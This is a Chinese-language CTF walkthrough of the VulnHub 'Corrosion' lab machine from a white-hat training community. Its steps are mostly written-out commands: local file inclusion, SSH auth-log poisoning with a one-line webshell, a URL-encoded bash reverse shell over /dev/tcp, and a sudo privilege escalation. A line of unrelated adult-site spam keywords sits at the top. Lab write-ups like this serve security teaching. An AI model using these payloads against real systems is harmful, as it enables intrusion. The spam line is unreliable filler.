七区九区一区在线,欧美另类在线观看,一本人妻无码,手机看片日,日本私人色噜噜影院,婷婷婷夜色,成人少妇网站,天天爽夜夜爽一区二区三区

作者：Kap 編輯：白帽子社區(qū)運(yùn)營團(tuán)隊(duì)

"白帽子社區(qū)在線CTF靶場BMZCTF，歡迎各位在這里練習(xí)、學(xué)習(xí)，BMZCTF全身心為網(wǎng)絡(luò)安全賽手提供優(yōu)質(zhì)學(xué)習(xí)環(huán)境，鏈接（http://www.bmzclub.cn/）

I. 信息收集

掃描主機(jī)

nmap -sP 192.168.189.*

端口掃描

nmap -sS -p 1-65535 -sV -v 192.168.189.129

檢測到80和22端口，嘗試ssh弱口令無果，訪問80端口。

目錄掃描

打開/blog-post/后看到以下頁面

因?yàn)槭莻€(gè)目錄，試試?yán)^續(xù)掃描該目錄

發(fā)現(xiàn)一個(gè)跳轉(zhuǎn)和一個(gè)uploads目錄，繼續(xù)掃描該目錄

沒有發(fā)現(xiàn)什么東西，再回頭看看剛剛那個(gè)跳轉(zhuǎn)目錄

打開后沒有任何東西

II.漏洞利用

經(jīng)過嘗試，在.php后加上?file=/etc/passwd，但是/etc/shadow讀取不了，猜測是權(quán)限不夠。

然后發(fā)現(xiàn)可以讀取/var/log/auth.log文件，這樣的話可以嘗試在ssh登陸時(shí)將一句話木馬放在用戶名的位置，將一句話送入用戶登陸日志，再用文件包含去包含日志文件。

回到頁面上，在url后加上&123=pwd

 ?file=/var/log/auth.log&123=pwd

搜索/var，看到

將pwd命令改為whoami，再看相同位置

 ?file=/var/log/auth.log&123=whoami

III.反彈shell

?file=/var/log/auth.log&123=bash%20-c%20%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.189.130%2F7070+0%3E%261%27

發(fā)現(xiàn)備份文件

使用curl下載到kali

curl http://192.168.189.129/blog-post/archives/randylogs.php?file=/var/backups/user_backup.zip -o user_backup.zip

下載成功后發(fā)現(xiàn)解壓需要密碼，使用rockyou字典爆破

解壓

得到密碼，嘗試登陸靶機(jī)

登陸成功

IV.提權(quán)

查看普通用戶可以使用的root命令

發(fā)現(xiàn)一個(gè)可以root權(quán)限執(zhí)行的文件，打開對應(yīng)目錄，并執(zhí)行

回到kali，將剛剛壓縮包里的easysysinfo.c文件中的最后一個(gè)命令改為

bash -i

使用scp命令將文件傳輸?shù)桨袡C(jī)上對應(yīng)的目錄中

 scp easysysinfo. c randy@192.168.189.129:/home/randy/tools/

先刪掉eazysysinfo

 rm -rf easysysinfo

編譯

 gcc easysysinfo.c -o easysysinfo

運(yùn)行

提權(quán)成功

往期精彩文章

技術(shù)支持：白帽子社區(qū)團(tuán)隊(duì)

— 掃碼關(guān)注我們 —

vulnhub-Corrosion靶機(jī)通關(guān)攻略